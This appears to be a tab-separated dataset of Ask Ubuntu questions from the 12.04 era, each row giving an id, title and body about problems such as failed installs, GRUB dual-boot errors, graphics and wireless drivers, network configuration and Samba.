185956	installing 12.04 failing	i just downloaded 12.04 burned it to a cd , and booted to into it on my last built computer . it loads a purple screen , then goes to a dos looking screen with a blinking cursor then loads the ubuntu loader . the lights go from red to white and finally they all turn red . this is when the entire screen goes to noise and just hangs . seems like a hardware issue but i can successfully boot into a non genuine windows7 that i 'm looking to replace . i 'm not sure what to try , so any help would be appreciated . thanks .
185957	how to set acpi=off for installation ?	i 'm trying to install ubuntu 12.04 lts 64bit from a usb created in windows using the recommended software from pendrivelinux . the usb is tested on two laptops and works fine . the install does not work on my desktop pc , it either hangs with lots of text on the screen , or it just gives me a screen with garbled colors . right now it hangs on `` [ 3.925311 ] initializing usb mass storage driver ... '' , but it hangs on different spots every time i try . i know that acpi=off will fix this . on older versions , there used to be a pink screen with the icon of a keyboard , at that screen i could press esc , and i would then get a long list of languages , i could choose english , and then i would get options for setting acpi=off , then install without any problems . this new install menu does not have those options . the ( now black and white ) `` installer boot menu '' 's advanced options is blank . there simply are no advanced options . if i go to help , then press f6 , i get to a help screen describing the different boot parameters . i see examples of writing `` install acpi=off '' however , writing `` install acpi=off '' it gives an error saying `` could not find kernel image : install '' . how can i install ubuntu 12.04 with acpi=off ? ( oh , btw , nothing happens if i press f6 in the `` installer boot menu '' )
185959	software center is not opening or closing by itself	my software center is not opening or closing by itself : e : malformed line 57 in source list /etc/apt/sources.list ( dist parse ) e : the list of sources could not be read e : the package lists or status file could not be parsed or opened .
185962	autojump in 12.04 does n't work	https : //launchpad.net/ubuntu/+source/autojump i installed with apt-get , checked out the man page and added . /usr/share/autojump/autojump.sh to my .bashrc , like it says . when i cd around the filesystem , nothing gets added to ~/.local/share/autojump . i then tried adding . /usr/share/autojump/autojump.bash , but that did n't work either . autojump -a ~/dropbox properly creates a file ~/.local/share/autojump/autojump.txt , but running j drop < tab > does n't autocomplete to j ~/dropbox/ as it should . however , j < tab > does autocomplete to j ~/dropbox . i know my bash-completion is working since it works for git , dd , and others . i know there 's a newer version in the repositories set for quantal . perhaps that would work ? i do n't know how to install that version though . i 've used autojump with mac homebrew ( and it installed without any issue ) , so i know there is missing functionality . in general i 'm really annoyed that i ca n't get this working ... i 've spent hours on it ! needless to say , help would be very appreciated .
185963	not showing linux pc 's in network list	i have ubuntu precise and my brother has windows 7 , as well as my sister having windows 7 too . i can see them in the network list , they can see each other in the list , however they are not able to see me . why is this so ? i need this function to be able to operate because we use file sharing functions .
185969	ubuntu 12.04 update and graphics card update	i have recently updated my dell m101z system to ubuntu 12.04 . but now there is some problem with the videos . so i guess i need to update the graphics driver . i tried following command : sudo apt-get install fglrx fglrx-amdccclete but it is showing warning that e : unable to locate package fglrx-amdccclete . kindly help me regarding this
185978	i ca n't boot windows 7 any more after dual booting it with ubuntu .	i just recently installed ubuntu 12.04 alongside with my windows 7 , and when i restarted my computer after the installation it does n't give me a menu asking me whether i want to use ubuntu or windows 7 , it just goes to ubuntu . please help me because i need to use a lot of programs that i can only use on windows .
185979	how do i and can i switch between windows 7 and ubuntu 12.04 at random ?	how do i and can i switch between windows 7 and ubuntu 12.04 at random ? i have downloaded ubuntu and wubi . i am very new at this and just want to make sure i do n't lose my windows os setup . can i just boot from a disc whenever i want to use ubuntu ? i do n't want to start the wubi process and then not be able to get back to windows when i want and vice versa .
185984	ca n't boot 12.04 installed alongside windows 7	i realize there are other questions like this one here , but i have visited them and tried several things and nothing is helping . one of them had a suggestion to boot the livecd , and sudo mount /dev/sda* /mnt and to then chroot and reinstall grub . i did this and it did not help . then on the windows side , i downloaded a free version of easybcd and chose to add a grub2 ubuntu 12.04 entry . on restart i saw this entry , but when i click on it it takes me to a windows failed to boot error , as if it was n't even trying to boot ubuntu . i have booted from ubuntu livecd once again and have a snapshot of my gparted i ran this bootinfoscript thing from the livecd , here are my results : it seems grub is on sda . i just want to be able to boot into my ubuntu on startup . **boot info script 0.61 [ 1 april 2012 ] ** ============================= boot info summary : =============================== = > grub2 ( v1.99 ) is installed in the mbr of /dev/sda and looks at sector 1041658947 of the same hard drive for core.img . core.img is at this location and looks for ( , gpt7 ) /boot/grub on this drive . sda1 : __________________________________________________________________________ file system : vfat boot sector type : windows 7 : fat32 boot sector info : no errors found in the boot parameter block . operating system : boot files : /efi/boot/bootx64.efi sda2 : __________________________________________________________________________ file system : boot sector type : - boot sector info : mounting failed : mount : unknown filesystem type '' sda3 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : windows 7 boot files : /bootmgr /boot/bcd /windows/system32/winload.exe sda4 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : sda5 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : /bootmgr /boot/bcd sda6 : __________________________________________________________________________ file system : bios boot partition boot sector type : grub2 's core.img boot sector info : sda7 : __________________________________________________________________________ file system : ext4 boot sector type : grub2 ( v1.99 ) boot sector info : grub2 ( v1.99 ) is installed in the boot sector of sda7 and looks at sector 1046637581 of the same hard drive for core.img . core.img is at this location and looks for ( , gpt7 ) /boot/grub on this drive . operating system : ubuntu 12.04 lts boot files : /boot/grub/grub.cfg /etc/fstab /boot/grub/core.img sda8 : __________________________________________________________________________ file system : swap boot sector type : - boot sector info : ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes partition boot start sector end sector # of sectors id system /dev/sda1 1 1,465,149,167 1,465,149,167 ee gpt guid partition table detected . partition start sector end sector # of sectors system /dev/sda1 2,048 411,647 409,600 efi system partition /dev/sda2 411,648 673,791 262,144 microsoft reserved partition ( windows ) /dev/sda3 673,792 533,630,975 532,957,184 data partition ( windows/linux ) /dev/sda4 533,630,976 1,041,658,946 508,027,971 data partition ( windows/linux ) /dev/sda5 1,412,718,592 1,465,147,391 52,428,800 windows recovery environment ( windows ) /dev/sda6 1,041,658,947 1,041,660,900 1,954 bios boot partition /dev/sda7 1,041,660,901 1,396,174,572 354,513,672 data partition ( windows/linux ) /dev/sda8 1,396,174,573 1,412,718,591 16,544,019 swap partition ( linux ) blkid output : ________________________________________________________________ device uuid type label /dev/loop0 squashfs /dev/sda1 b498-319e vfat system /dev/sda3 820c0da30c0d92f9 ntfs os /dev/sda4 168410ab84108efd ntfs data /dev/sda5 ac7a43ba7a438056 ntfs recovery /dev/sda7 42a5b598-4d8b-471b-987c-5ce8a0ce89a1 ext4 /dev/sda8 5732f1c7-fa51-45c3-96a4-7af3bff13278 swap /dev/sr0 iso9660 ubuntu 12.04 lts i386 ================================ mount points : ================================= device mount_point type options /dev/loop0 /rofs squashfs ( ro , noatime ) /dev/sr0 /cdrom iso9660 ( ro , noatime ) =========================== sda7/boot/grub/grub.cfg : =========================== how can i get this option ? when i was using easybcd , it kept saying i had no entries at all , so i did the add entry thing for ubuntu many times and i see several of those on boot screen now . i 'd love to get rid of all those unusable options .
185989	computer crashing after a few minutes of logging in	i have a fresh install of 12.04.1 on my machine . it is constantly crashing after logging in . i noticed it crashed repeatedly when using minitube and would crash in chrome . it seems to be that anything graphics related is causing it ? i 've booted the system 7 times and each time it would crash within 5-10 minutes after logging in . i have no swap and it 's a dual-boot system with windows 7 . my system specs : amd phenom xii 925 8gb ddr3 ( new ) amd radeon hd 7770 gpu ( new ) seagate 1tb barracuda hdd ( new ) catalyst drivers
185991	how does one find out which application is associated with an indicator icon ?	it is trivial to do this in ubuntu 10.04 . the question is specific to ubuntu 12.04 . a composition using the dbus with implementation details in followup is missing for some reason so an alter ego composed the answer ( the trivial but somewhat laborious process is explained here ) . this response regarding gdbus is useful but this answer is super useful - ( quiescent system overhead has now been reduced to an acceptable ~10 % ) . some pertinent references ( src : answer to what is the difference between indicators and a system tray ? : here is the documentation for indicators : application indicators | ubuntu app developer libindicate reference manual libappindicator reference manual also desktopexperienceteam/applicationindicators - ubuntu wiki ref : how can the application that makes an indicator icon be identified ? ( this link inappropriately redirects to http : //askubuntu.com/questions/184589/how-can-menu-bars-that-require-a-right-click-be-activated-like-ubuntu-versions ) bookmark : how does one find out which application is associated with an indicator icon in ubuntu 12.04 ? is a serious question for reasons & problems outlined below and for which a significant investment has been made and is necessary for remedial purposes . reviewing refs . to find an orchestrated resolution ... ( an indicator ap . indicator maybe needed ) this has nothing to do ( does it ? ) with right click . how can an indicator 's icon in ubuntu 12.04 be matched with the program responsible for it 's manifestation on the top panel ? a list of running applications can include all processes using system monitor . how is the correct matching process found for an indicator ? how are the sub-indicator applications identified ? these are the aps associated with the components of an indicators drop-down menu . ( this was to be a separate question and quite naturally follows up the progression . it is included here as it is obvious there is no provisioning to track down offending either sub or indicator aps . easily . ) ( the examination of sm points out a rather poignant factor in the faster battery depletion and shortened run time - the ambient quiescent cpu rate in 12.04 is now well over 20 % when previously , in 10.04 , it was well under 10 % , between 5 % and 7 % ! - the huge inordinate cpu overhead originates from xorg and compiz - after booting the system , only sm is run and all processes are selected , sorting on % cpu - switching between resources and processes profiles the execution overhead problem - running another ap like gedit `` text editor '' briefly gives it cpu priority - going back to s & m several aps . are at the top of the list in order : gnome-system-monitor as expected , then : xorg , compiz , unity-panel-service , hud-service , with dbus-daemon and kworker/x : y 's mixed in with some expected daemons and background tasks like nm-applet - not only do xorg and compiz require excessive cpu time but their entourage has to come along too ! further exacerbating the problem - our compute bound tasks no longer work effectively in the field - reduced battery life , reduced cpu time for custom ap.s etc . - and all this precipitated from an examination of what is going on with the battery ap . indicator - this was and is not a flippant , rhetorical or idle musing but has consequences for the credible deployment of 12.04 to reduce the negative impact of its overhead in a production environment ) ( i have a problem with the battery indicator - it sometimes has % and other times hh : mm - it is necessary to know the ap . & v. to get more info on controlling same . ditto : there are issues with other indicator aps . : nm vs. iwlist/iwconfig conflict , bt ap . vs rf switch , battery ap . w/ no suspend/sleep for poor battery runtime , ... the list goes on ) details from : how can i find application indicator id 's ? suggests looking at : file : ///usr/share/indicator-application/ordering-override.keyfile [ ordering index overrides ] nm-applet=1 gnome-power-manager=2 ibus=3 gst-keyboard-xkb=4 gsd-keyboard-xkb=5 which solves the battery ap . identification , and presumably nm is networkmanager for the rf icon , but the envelope , blue tooth and speaker indicator aps . are still a mystery . ( also , the ordering is not correlated . ) mind you , it was simple in the past to simply right click to get the about option to find the ap . & v. info . browsing around and about : file : ///usr/share/indicator-application/ordering-override.keyfile examined : file : ///usr/share/indicators file : ///usr/share/indicators/messages/applications/ ... perhaps ? /presumably ? the information sought may be buried in file : ///usr/share/indicators a reference in the comments was given to : what is the difference between indicators and a system tray ? quoting from that source ... unfortunately desktop indicators are not well documented yet : i could n't find any specification doc ... well ... the actual document https : //wiki.ubuntu.com/desktopexperienceteam/applicationindicators # summary does not help much but it 's existential information provides considerable insight ...
185993	how do i find the correct modeline to connect my computer to my televsion	i 've been trying to hook up a ubuntu computer with my panasonic th-42pa60a plasma television for weeks now . my original question was asked here , which includes all the specifications about the television in detail and how i 've connected the computer to the televsion . so far , i 've tried hooking up three other computers ; 2 ubuntu computers with fairly new graphic cards , and a windows xp computer . none of them have been able to display an image on the television . the closest i 've come to getting a picture up is with my small laptop running ubuntu , however the image came out all purple and distorted . i had gotten the image by adding extra modes via the xrandr command , using a process similar to described here . i realize it might be possible to get this working if i had the correct modeline . i 've checked the modeline database , but the panasonic th-42pa60a is not listed . how can i find the correct modeline for my television . what commands can i use ? i 've read that there may be a danger of damaging my tv when doing things like this . what things should i avoid to prevent damaging my television ?
186002	brightness does n't change on sony laptop	i installed ubuntu 12.04 on my laptop for first time and every thing work well but the only thing does n't work is the brightness does n't change when i press f5 and f6 with fn so i ca n't adjust the brightness and sometimes i need to decrease it for more time working on battery and the bubble appear that it changed but nothing happens my laptop is sony vaio series f with nvidia geforce ... and nvadia accelerated graphic driver is activated
186003	anything better than cheese for video capture ?	i need to record some video from my webcam and while cheese works , it lacks settings , and only outputs the webm format that is full of stutters , etc . ca n't seem to find any alternative ...
186004	display resolution all wrong iin 12.04.1 running in vbox	i have a ubuntu 12.04.1 ( 64bits ) system , running perfectly alongside windows 7 . i needed to create a virtual machine in vbox running the same 12.04.1 ( 64bits ) . i have a 15 inch notebook w/ nvidia graphics , display running at 1920*1080 on the host system . installed the guest additions and restarted the vm configured the vm for 128 mb ( max ) of memory for the graphics i can only configure the 4:3 display resolutions : 1280*960 / 1023*768 / 800*600 what can i do to be able to have 16/10 1920*1080 ?
186007	banshee gapless playback does not work when playing mp3s	even though i have gapless playback enabled in banshee 's settings menu , there is a very short pause between songs . this might be due to the fact that my hard drive 's partitions seem weird . fdisk -l produces this output : disk /dev/sda : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x4a73c3cb device boot start end blocks id system /dev/sda1 * 2048 409599 203776 7 hpfs/ntfs/exfat /dev/sda2 409600 724153740 361872070+ 7 hpfs/ntfs/exfat /dev/sda3 1456826368 1465145343 4159488 c w95 fat32 ( lba ) /dev/sda4 724154366 1456826367 366336001 5 extended partition 4 does not start on physical sector boundary . /dev/sda5 1440159744 1456826367 8333312 82 linux swap / solaris /dev/sda6 724154368 1440159743 358002688 83 linux partition table entries are not in disk order playing mp3 's from /dev/sda2 or /dev/sda6 produces this problem . i do n't seem to have gapless playback on rhythmbox or clementine either , if those media players are supposed to have it . i 'm not sure what other info to provide . this is just annoying to me . thanks for any help . edit : this is in ubuntu 12.04
186009	fglrx installation without success - gl_conf issue	i followed the steps of this guide . i 've installed the drivers without any problems with sudo dpkg -i fglrx*.deb . the next step is generate a new /etc/x11/xorg.conf file , but i ca n't do this due to the following reason : when i enter sudo aticonfig -- initial -f the terminal show me this output : sudo : aticonfig : command not found this problem is caused by an error with the symbolics links into the fglrx directory . look at this section , where you can see -how to fix it- but it does n't work for me . why it does n't ? because after i enter sudo update-alternatives -- auto gl_conf the terminal show me this : update-alternatives : error : no alternatives for gl_conf . what i have to do to fix this problem ? gc : ati radeonhd 6670
186011	dell bios nightmare on optiplex	i own a dell optiplex gx260 pc and i got bios revision a03 and want to go higher like a09 . i tried the dell support page using the wine program down loader after a little configuring and set up on install shield wizard i get the message : unable to obtain required information about your system ... setup can not complete . the pc does n't have a floppy diskette drive any more and the other option using download manager is only executable via windows internet explorer i do n't blame wine or anybody else but this is frustrating .
186015	can not open gedit display on ubuntu server 12.04	i just installed ubuntu server 12.04 32 bit . i need to perform the following command in a terminal window : sudo gedit /etc/samba/smb.conf first the gedit command did not work ; therefore , i did : sudo apt-get install gedit then i typed sudo gedit /etc/samba.smb.conf and now i am getting : can not open display can anyone help ?
186016	why does update manager give me an `` unable to mark upgrades '' error ?	i am getting the following error ( in the screen shot ) when i try to install updates . can someone explain to me why this is happening and possibly offer a way to fix it ? thanks
186018	how to share/access partitions from ubuntu vmware ?	i am a beginner at ubuntu . here is my problem . i have ubuntu installed on my external hdd and i am running xp through vmware on ubuntu , because my internal disk is dead at the moment . external hdd have ext4 ( 37gb ) and 2 ntfs partitions ( 36gb and 220gb ) . how can i access that 220gb ( or 36gb ) ntfs partitions from vmware xp ? i already tried searching for similar posts but with no luck .
186019	/etc/resolv.conf nameserver fd00 : :1	my /etc/resolv.conf constantly get a mysterious entry , i run a home network with ipv6 provided by ravd , the interface is auto-configured by network manager ( all name server lookups are lost when this line is first in my /etc/resolv.conf ) . dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) ** # do not edit this file by hand -- your changes will be overwritten** nameserver fd00 : :1 nameserver 192.168.1.1 search home.int when ping is working cat /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 192.168.1.1 search home.int so something is putting fd00 : :1 at start of file , not if i ping6 fd00 : :1 i get destination unreachable : administratively prohibited to diagnose this i ran the router with single cable to connected to ubuntu machine . ran tcpdump + restarted network on ubuntu . `` tcpdump ip6 -e -i eth0 | grep fd00 '' finds nothing , it 's not being advertised via the network.. the only hit i got was when an upstream router refused a connection attempt from the ubuntu machine to fd00 : :1 . i have also switched on debug for network manager & it appears to set the mystery line.. 15:22:14 storage-pc networkmanager [ 349 ] : < info > activation ( eth0 ) stage 5 of 5 ( ipv4 commit ) complete . 15:22:14 storage-pc networkmanager [ 349 ] : < warn > dnsmasq exited with error : other problem ( 5 ) 15:22:14 storage-pc networkmanager [ 349 ] : < debug > [ 1346822534.281528 ] [ nm-dns-manager.c:598 ] update_dns ( ) : updating resolv.conf 15:22:14 storage-pc networkmanager [ 349 ] : < debug > [ 1346822534.281875 ] [ nm-dns-manager.c:719 ] update_dns ( ) : dns : plugin dnsmasq ignored ( caching disabled ) 15:22:14 storage-pc networkmanager [ 349 ] : < info > ( ( null ) ) : writing resolv.conf to /sbin/resolvconf 15:22:14 storage-pc dbus [ 2184 ] : [ system ] successfully activated service 'org.freedesktop.nm_dispatcher' 15:22:14 storage-pc dnsmasq [ 2875 ] : reading /etc/resolv.conf 15:22:14 storage-pc dnsmasq [ 2875 ] : using nameserver 192.168.1.1 # 53 15:22:14 storage-pc dnsmasq [ 2875 ] : using nameserver fd00 : :1 # 53 any suggestions on how to find out where this comes from ?
186022	ubuntu server 12.04 new installation does not boot	i 've just installed server 12.04 on a new machine . it 's got two network cards and two hard drives . during installation it asked me if i wanted to make it raid and i said ok to that . finally , it came to the packages options and i chose things like samba , lamp , etc . and then it asked to reboot without the cd . did that and that 's where the problem started . nothing comes on the screen . only a blinking cursor . has anyone experienced this problem ? i 'm guessing that it may be a raid issue . not sure . any thoughts please ...
186032	unable to get wireless working , rt2800 pci [ 1814:0601 ] , rt2x00queue_write_tx_frame : error	partial noob here , wanted to try mythbuntu to replace a dying tivo , and am having problems with some of the basics . after a weekend of studying , i 've learned a bit but i keep hitting dead ends i do n't know quite how to overcome . uname -a linux shade 3.2.0-30-generic # 48-ubuntu smp fri aug 24 16:52:48 utc 2012 x86_64 x86_64 x86_64 gnu/linux initial behavior : wireless networks would not show up in the `` network manager '' ? ( is that the name ? i see an icon in the upper right of the gui ( figured out running xfce ) that i click and it changes when i plug the ethernet cable ) . lspci -nn 05:00.0 network controller [ 0280 ] : ralink corp. rt2800 802.11n pci [ 1814:0601 ] using http : //wireless.kernel.org/en/users/documentation/faq mostly as a guide , i started by installing the latest and greatest compat-wireless for rt2x00 drivers . current behavior : fresh when restarting , i see ssids in the network manager and i try to connect to mine , a wpa2 protected network . i 'm prompted for the password and enter it . the network manager icon swirls for about a minute and then it reprompts for my password . i know i have the right password , i deleted and retried my password information from a separate windows machine and it worked as typed . eventually i hit cancel and the ssids all disappear from the network manager . iwlist wlan0 scan wlan0 no scan results checking for , um , not sure , dmesg command was something i was typing a lot so i added it to my running paper notes . looks like it 's errors or notifications or some kind of log . the numbers on the left keep changing , maybe elapsed time or something . dmesg | tail [ 3321.935084 ] phy0 - > rt2x00queue_write_tx_frame : error - dropping frame due to full tx queue 0 . [ 3381.899236 ] phy0 - > rt2x00queue_write_tx_frame : error - dropping frame due to full tx queue 0 . [ 3441.855438 ] phy0 - > rt2x00queue_write_tx_frame : error - dropping frame due to full tx queue 0 . [ 3501.819676 ] phy0 - > rt2x00queue_write_tx_frame : error - dropping frame due to full tx queue 0 . [ 3561.779743 ] phy0 - > rt2x00queue_write_tx_frame : error - dropping frame due to full tx queue 0 . [ 3621.738350 ] phy0 - > rt2x00queue_write_tx_frame : error - dropping frame due to full tx queue 0 . [ 3681.697177 ] phy0 - > rt2x00queue_write_tx_frame : error - dropping frame due to full tx queue 0 . [ 3741.655319 ] phy0 - > rt2x00queue_write_tx_frame : error - dropping frame due to full tx queue 0 . [ 3801.613986 ] phy0 - > rt2x00queue_write_tx_frame : error - dropping frame due to full tx queue 0 . [ 3861.572981 ] phy0 - > rt2x00queue_write_tx_frame : error - dropping frame due to full tx queue 0 . checked for `` blocks '' , not really sure what this means , but i 'm running on a newly built desktop rfkill list 0 : phy0 : wireless lan soft blocked : no hard blocked : no also tried using iw , but it returned nothing . sudo iw dev wlan0 scan and after running dmesg again i see the same types of error messages , with a different number in front of each line . i 'm pretty sure i 'm screwing up with wpa_supplicant : sudo wpa_supplicant -dwext -iwlan0 -ctest.conf ioctl [ siocsiwencodeext ] : invalid argument ioctl [ siocsiwencodeext ] : invalid argument ctrl_iface exists and seems to be in use - can not override it delete '/var/run/wpa_supplicant/wlan0 ' manually if it is not used anymore failed to initialize control interface '/var/run/wpa_supplicant ' . you may have another wpa_supplicant process already running or the file was left by an unclean termination of wpa_supplicant in which case you will need to manually remove this file before starting wpa_supplicant again . and my test.conf looks like , modified from the example from the wpa_supplicant site since i do n't have a `` wheel '' group , figured i 'd be fine with the sudo group # allow frontend ( e.g. , wpa_cli ) to be used by all users in 'wheel ' group ctrl_interface=/var/run/wpa_supplicant ctrl_interface_group=sudo # # home network ; allow all valid ciphers network= { ssid= '' feroz '' scan_ssid=1 key_mgmt=wpa-psk psk= '' ****** '' } i 'm not really sure where to go from here , since the rt2x00 is supposedly supported so , dunno what 's up . i 'm not morally opposed to using ndis to use the windows drivers , but the drivers are locked away behind installshield and i ca n't extract them from the installation file . any help would be appreciated so i do n't spend another xx hours banging rocks together .
186033	how to reinstall server	since i got a blank screen after installation , i tried to reinstall the server os 12.04 using the cd . this time after the country and login information are given , it asks me to specify some scsi settings . i do n't recall doing any such thing . what can this be ? without doing this step , it says that there 's no root . i 've got 2 hdds and i initially specified them as raid during the last installation . i think i 've messed up the settings and i just want to reinstall the whole thing afresh . any ideas please ...
186042	ca n't add podcast episodes to ipod after upgrading to 12.04	since upgrading to 12.04 , dragging podcast episodes does n't move them onto my ipod . adding songs from the library works fine , but if i do it with a podcast nothing happens .
186046	has anyone encountered problems with trash drives on ntfs partitions ?	i have my ssd on ext4 and my shared data drive on ntfs . unless anyone can think of good reason not to , i want to move the trash folder out of the cramped ssd onto the ntfs partition . any horror stories or problems ?
186047	uninstall gmusic browser	i would like to uninstall gmusic browser from my xubuntu installation . i find it does not meet my playback requirements . how do i go about this ?
186049	after suspend i can not control the brghtness of the screen	neither the keyboard keys not the control panel fixes this issue . the only solution is to reboot , which is a pain . how do i fix this ? specs : toshiba portege z935 ubuntu 12.04
186057	samba recycle bin in ubuntu 12.04	i have upgraded my ubuntu 10.04 server to ubuntu 12.04 , after setting samba i 'm facing few problems , samba recycle bin not working properly , i have set my existing partition as samba recycle repository but whenever i delete some thing samba just make folder tree but the deleted file is missing . for example , i delete : /audit-data/sambatest/test.doc so in delete-files it shows : /audit-data/sambatest/ the file is missing . if i set .recycle folder in my shared samba directory then samba recycle working fine .
186062	trying to setup a gateway via pppoe	i just installed ubuntu 12.04 on a computer . i want to use this computer as a router for my other computers . the computer only has 1 network card , there is no slot for a second card . i can get the computer to connect to my isp via pppoe and it can access the web . however the other computers on my local net can only see the router computer . i have tried 2 different pppoe packages , roaring penguin and network-manager-gnome . when i get it to work i will be replacing a 15 year old computer that is running slackware 7.1 . the old computer is currently my router . it is running roaring penguin > i tried to setup the new computer with the same roaring penguin parameters as the old computer . bob
186065	how to burn cd with the cd/dvd creator	is there some trick to burning a cd with the cd/dvd creator ? i 'm installing k3b because that 's a known entity . what is this , and where is the `` burn '' button ? help just tells me this is nautilus 3.4.1 , but i do n't see a burn button to click . there 's no option to burn in the files menu , nor does clicking on the whitespace indicate an option to burn anything .
186068	grub can not boot after resizing windows xp ( ntfs ) partition . what is to be done ?	i had installed lubuntu on a pc with windows xp and used dual boot for some time with no problems . since i had almost abandoned windows ( kept it for printing ... ) i decided to resize its ntfs partition and add the free space to my ubuntu space . tried that with a gparted stick and a live cd but would not work due to an issue related to the ntfs partition : gparted signaled with a red exclamation point that there was a problem with that partition . i read that a checkdisk might solve it but in the end used easeus in windows to shrink ( resize ) the ntfs partition and create a new one ( ext3 ) from the space left . all seemed ok with that procedure : but resizing the partition and moving the data might have affected the grub file : or whatever the following message means , which i get when trying to start my pc : error : file not found grub rescue > booting from a live cd i see , beside the shrinked windows partition and my old linux one , the newly created partition , containing a directory called lost+found that i can not open . can i fix the grub file and recover both my xp and lubuntu installations ?
186071	how linux kernel ( used in ubuntu ) manages concurrent access to the data ?	i want to know how linux kernel used in ubuntu manages concurrent access to shared data ?
186074	how to remove the wine windows program loader from dashboard launcher in ubuntu 12.04	unlock from launcher option is not appearing when i right click on the `` wine windows program loader '' in the dashboard , while it is appearing for all the other icons in the launcher
186075	ubuntu 11.04 not updating	i have a 11.04 running on my pc . it is not able to upgrade either through the gui or terminal . it simply does not show the option of upgrading , it simply says no updates available .
186078	main differences between ubuntu studio 12.04 and ubuntu 12.04	what are the differences between ubuntu studio 12.04 and ubuntu 12.04 have a nice time .
186081	how to stop configuring network services	my computer upon start up taking about 5 minute during boot time configuring network and allowing 60 seconds to complete its task . how to stop these services . it starting this services every time upon start up . could me help me on above issue .
186086	installing gnome 3 in ubuntu 12.04	i have installed gnome shell using following command but i got wrong version.so is there a way for me to install the latest build ? installed gnome look like gnome 2. sudo add-apt-repository ppa : gnome3-team/gnome3 sudo apt-get update sudo apt-get install gnome-shell
186087	how to connect two ubuntu laptops using putty ?	i am trying to connect two ubuntu laptops ( server and client ) using putty . here is the description : laptop a : ubuntu server 12.04 kernel : 3.2.0 laptop b : ubuntu 12.04 kernel : 3.2.0 initially , made following attempts : connecting ubuntu server to the internet ( wireless network ) using referred link . installed openssh-server in the laptop a , putty in laptop b . seen the different options in the /etc/ssh/sshd_config shows access denied while trying to login in ( after i have entered the correct password ) from the laptop b . referred link . does n't work . please help . also tried this earlier : ssh -v username @ serveraddress -p 22 it says connection established with the server , but shows permission denied when password is entered .
186088	switching from an ubuntu derivative to original ubuntu	i installed zorin 6 ( based on ubuntu 12.04 ) , because i like all the whistles it has ( plymouth screen , compiz effects , installed codecs , sound themes , etc. ) . i miss though the modern and futuristic unity environment ( launcher , dash , hud , indicators etc. ) . is there a way to switch from zorin to ubuntu 12.04.1 lts and keep all these effects ? or what additional software should i install in an ubuntu clean install to add the effects zorin has ( plymouth , compiz effects , sounds , audio and video codecs etc . )
186098	how to install sun java 6 jdk and jre to ubuntu 12.04	for hadoop , i should install sun-java6-jdk and jre to my ubuntu 12.04 . but , i could not manage to install . how can i install it to ubuntu 12.04 ? note : in http : //snapshot.debian.org/binary/sun-java6-jdk/ , there is deb file . but , i could not install sun-java6-jdk and jre via apt-get .
186109	problems with secondary monitor in ubuntu 12.04	i have recently installed ubuntu 12.04 on my asus eee pc 1015bx . i am a true novice with regards to ubuntu . i started running ubuntu via usb stick but this seemed to stall often ; i think that this has to do with the fact that all is run within ram , of which this computer only holds 1 gbyte . when running via usb stick , i had a secondary monitor ( samsung syncmaster 191t ) connected and this seemed to work fine . the system automatically detected this and set the resolution and i was able to use both this and the laptop 's monitors independently . after installing ubuntu on the hard drive alongside with windows 7 , i can not get this to work anymore . the system will let me mirror the monitors but when attempting to set the external monitor up as secondary , i am met with an error message that translates to something like `` the chosen display configuration could not be used - the virtual size does not correspond to the available sizes : requested= ( 2304 , 1024 ) , minimum= ( 320 , 200 ) , maximum= ( 1280 , 1280 ) '' followed by another error message that says something like `` gdbus.error : org.gtk.gdbus.unmappedgerror.quark._gnome_2drr_2derror_2dquark.code3 : requested virtuel size does not correspond to the available size : requested= ( 2304 , 1024 ) , minimum= ( 320 , 200 ) , maximum= ( 1280 , 1280 ) '' . i have read something somewhere regarding returning to the native driver . it would make sence that the usb setup would use this native driver but that the installation has updated to one containing errors . i appreciate all the help i can get .
186114	how to diff two folders to multiple patch files	i 'm not much of a unix guy so i 'll just go ahead and ask : i have a following problem - two folders with plenty of subfolders . i need to diff them . i tried this : diff -drupn vanila_kernel_3.0.8 my_kernel_3.0.8 > kernel.patch and that results in a 85mb file ... and not really what i want . i want the result of the diff to be many smaller patches , ideally one for every changed file with the contents of the change . that means i have t ochange the way i use diff , and i need to put it in some sort of a loop ... so i tried running this little script for file in original_308/* . * ; do diff -dupn `` $ file '' `` my_308/ $ { file # # */ } '' > `` $ file '' .patch done but it does n't work : / ideally , i want to have a .patch file for every change , but having patches for files that changed in original would do just fine ( as i could filter the newly added files and just copy them over ) can someone provide me with a decent way to do this please ? edit : here 's something choroba asked me to post diff -naur -x '*.o ' -x '*.cmd ' -x '*.d ' original_308/arch/arm/boot/compressed/head.s my_308/arch/arm/boot/compressed/head.s -- - original_308/arch/arm/boot/compressed/head.s 2011-10-25 07:11:12.000000000 +0200 +++ my_308/arch/arm/boot/compressed/head.s 2012-07-04 03:57:25.000000000 +0200 @ @ -656,6 +656,8 @ @ @ b __arm6_mmu_cache_off @ b __armv3_mmu_cache_flush so yes , it is the proper output even though gedit/geany can not open it . ultraedit does ...
186122	no sound over pulseaudio in 12.04	i today rebooted computer and suddenly had no sound over pulse audio . when i test sound in sound settings it works perfectly . but when i run totem , rhythmbox , flash or anything else there is no sound . alsa works just fine .
